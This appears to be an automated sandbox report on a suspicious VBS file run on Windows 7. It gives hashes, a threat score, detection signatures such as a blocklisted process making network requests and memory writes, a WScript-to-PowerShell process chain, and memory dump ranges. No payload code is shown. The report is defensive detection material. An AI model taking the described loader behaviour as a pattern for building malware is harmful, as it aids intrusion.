Analysis

  • max time kernel
    150s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    19-11-2024 02:18

General

  • Target

    1b32b2a0b09264362731fefb3212dd89d0c5a588e202fe8cb0cc07b0612b06ae.vbs

  • Size

    15KB

  • MD5

    57a98d83eebfd7536413c107b5561bcd

  • SHA1

    ab660a6cdb0bd632e307fb5b69f895df31ef4c67

  • SHA256

    1b32b2a0b09264362731fefb3212dd89d0c5a588e202fe8cb0cc07b0612b06ae

  • SHA512

    9c985a943bcd416e290374c29619dfd7011450f8d469b3d899de2235a2dd79d2b1eb5d845ea199ecd95f5349f2fec137aab02bc46697f778a8ee95376ce80608

  • SSDEEP

    384:YwAAp2YC86mHC6GpbW+lqPIjijLUgZSPDctjjPhnwLCeFFBDq43UVcm9:YopU6OqPy6LUgaGvlwLZFFBD/3UqY

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1b32b2a0b09264362731fefb3212dd89d0c5a588e202fe8cb0cc07b0612b06ae.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1060
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2968

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabB27F.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • memory/2968-20-0x000007FEF621E000-0x000007FEF621F000-memory.dmp

    Filesize

    4KB

  • memory/2968-21-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

    Filesize

    2.9MB

  • memory/2968-23-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-24-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-22-0x0000000002A60000-0x0000000002A68000-memory.dmp

    Filesize

    32KB

  • memory/2968-25-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-26-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-27-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-28-0x000007FEF621E000-0x000007FEF621F000-memory.dmp

    Filesize

    4KB

  • memory/2968-29-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-30-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-31-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-32-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

  • memory/2968-33-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB